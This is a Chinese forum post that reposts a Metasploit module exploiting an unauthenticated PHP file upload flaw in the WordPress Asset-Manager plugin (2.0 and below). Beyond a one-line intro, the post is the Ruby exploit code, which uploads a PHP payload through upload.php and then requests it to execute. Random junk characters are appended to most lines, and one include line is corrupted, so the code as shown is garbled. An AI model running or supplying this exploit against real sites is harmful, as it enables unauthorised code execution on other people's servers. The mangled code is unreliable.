这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。5 K3 z. s( K2 o& Z+ R' j
' p$ m0 T, Z" E0 ?##
5 x+ e$ @/ w6 ]1 l) N# This file is part of the Metasploit Framework and may be subject to% p# ?. o" a" W6 g, s0 Y
# redistribution and commercial restrictions. Please see the Metasploit
" ?2 b# w9 M6 V# Framework web site for more information on licensing and terms of use.
% `; B& d( O3 u i: c# http://metasploit.com/framework/- L* i, M, `8 v6 B$ a, a. x
##
3 p) s' C. y. s# H' ? 9 R J* q) j3 P. i$ z8 n" G6 Y
require 'msf/core') ?$ K; D; \3 w s7 X$ T4 Q% L5 \: C
require 'msf/core/exploit/php_exe'
9 D I& t" `) G, [- b/ _* _
7 D% r# X/ f& B. l+ fclass Metasploit3 < Msf::Exploit::Remote" b- r7 n) T0 L& d* P% ] J3 m
Rank = ExcellentRanking5 x$ b0 H' H/ q$ a3 g' H8 n
+ e2 D( _9 @3 Y( \4 Z) e include Msf::Exploit::Remote::HttpClient
$ p& f' K% q& x include Msf::Exploit: hpEXE
- A* C7 o2 B0 @" M4 s
, Y0 S& x4 R5 m3 I def initialize(info = {})7 F- R: R: _( l; W
super(update_info(info,
2 x4 g5 S; O. Q( |% l 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',/ A6 B' j- p: g
'Description' => %q{
- [' e, l" c5 `6 @4 s+ A! c1 ?! e This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress9 K* ?9 p; i9 X6 M j
plugin. By abusing the upload.php file, a malicious user can upload a file to a( N8 G* _$ t" M( ]( ]5 U5 E
temp directory without authentication, which results in arbitrary code execution./ G, Q* {% J* s: H: a5 ? v
},, c' o3 @# u+ \! k% S; x
'Author' =>
: s1 B& [- s- U- p# ^2 P [$ W; q% h2 {; `4 N
'Sammy FORGIT', # initial discovery; L2 {: O& x" \- V" f/ t
'James Fitts <fitts.james[at]gmail.com>' # metasploit module/ b! f T8 `0 @* c
],
4 P% C- z- D l; j! B% L9 I 'License' => MSF_LICENSE,
7 h, w9 O% U- y; e, K$ _. B& z" E! B8 G 'References' =>/ I4 r9 X/ c+ b2 B/ _
[! A9 u3 I) f% [4 S' S2 w
[ 'OSVDB', '82653' ],
+ F9 s, W1 { G1 u$ J S [ 'BID', '53809' ],+ ^, S ]- z: F: E9 D4 T8 ?
[ 'EDB', '18993' ],
% n+ H, P( U8 R! A [ 'URL', 'http:// www.myhack58.com /' ]# X$ A% D. `$ [: l. g
],
7 U$ ~4 ~ C% _) \7 U 'Payload' =>' k' B& C4 _' Y+ P) d5 Z9 {
{
, h. V5 A* W1 D7 R 'BadChars' => "\x00",# j4 ~$ W$ [ l. A+ V
},
0 d C5 H3 R; `! u 'Platform' => 'php',& z- o7 W. w5 v$ j' K9 g: P
'Arch' => ARCH_PHP,
8 z* ^0 U' z$ h6 f/ a1 k# R 'Targets' =>) k% I0 U0 ^6 Q4 G2 q6 T0 F& |
[
& P% l& R0 _( U$ h [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
( T1 \) v M& r( a% F [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]2 N0 Y; _9 O. M+ I" t
],- }4 f' A: {+ {( n, n
'DefaultTarget' => 0,7 |6 f+ e p: a
'DisclosureDate' => 'May 26 2012'))( P% r2 V( g/ s6 o. [
y7 Z; X3 C0 K9 E8 S register_options(- ?2 I1 }! [5 N1 f# ^; w$ H
[
, {4 P. n6 s3 O- o- w& ] OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
! k& u5 z, ^9 J" m9 W! N+ } ], self.class)
: e+ X" {! o+ ?) j: ~9 L end0 R) t* Z; h3 P/ a4 I h3 l+ G: M" }
4 a' s& I! ^! g$ [3 O/ X0 | def exploit
" r, B3 ?/ Y: D$ E+ j2 b; g uri = target_uri.path
4 h8 O; I3 q; [( O W+ k: z uri << '/' if uri[-1,1] != '/'5 {) @: ?' m/ l
peer = "#{rhost}:#{rport}"
7 e' i+ l4 F U) m9 A: h payload_name = "#{rand_text_alpha(5)}.php", P' f+ D6 y( [* Z% O$ w3 p1 m: K
php_payload = get_write_exec_payload(:unlink_self=>true). b5 Q1 e- L( l, L2 R6 ~
# N; A* _% K; ]1 z- x data = Rex::MIME::Message.new
0 R/ p4 w+ y7 E$ c data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
e0 R" h" a3 M" P, ?% s( E post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')/ x2 h. _( ~/ J& K4 k7 V: r& v( X" \5 J
O ]. o5 \, Z
print_status("#{peer} - Uploading payload #{payload_name}")* v6 t* d2 m2 N8 L8 t
res = send_request_cgi({1 `! M) ]" O; S: |9 L- @
'method' => 'POST',
% p$ z i7 z3 C, V9 p6 k$ F 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",; K' y5 S* [5 Q! q4 T$ ~9 r0 ^1 [
'ctype' => "multipart/form-data; boundary=#{data.bound}"," b( G. K; k$ T- z+ R) C
'data' => post_data
: x7 H1 \' b W3 I# {3 C })
! V: f9 t' Q- k1 S0 f3 Q+ |( ? 6 v9 \* V- y# Y# Y2 T
if not res or res.code != 200 or res.body !~ /#{payload_name}/9 D: e' x! Z# |
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") z0 v+ t: o7 F$ w0 }- u/ Y# [" Z
end8 l2 b/ b |* Y( w
0 O5 k) ^7 w7 y; I
print_status("#{peer} - Executing payload #{payload_name}")5 k5 p" J. W* O# S% ^$ @# Z
res = send_request_raw({
" A6 Z% w/ _2 a7 z# V/ c 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",6 U2 w% A9 I) h! ~
'method' => 'GET'
& o. T: _" O; r3 O3 V! r, [% l: }+ S })
$ B. C- q. K- n% `) E1 T6 a4 a" V
; a5 D% V! X7 X if res and res.code != 200' d! u8 G Z; \5 J! a
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")* U; {; L5 B! \1 h1 r+ E" J7 I
end4 [1 G7 |; A6 G' _* o, S5 K
end
) g, i5 p9 I& D% ^/ X% C5 Aend
& Y+ @9 g) U0 P4 Z6 D0 a |
发表于 2012-12-31 09:22:33
收藏
支持
反对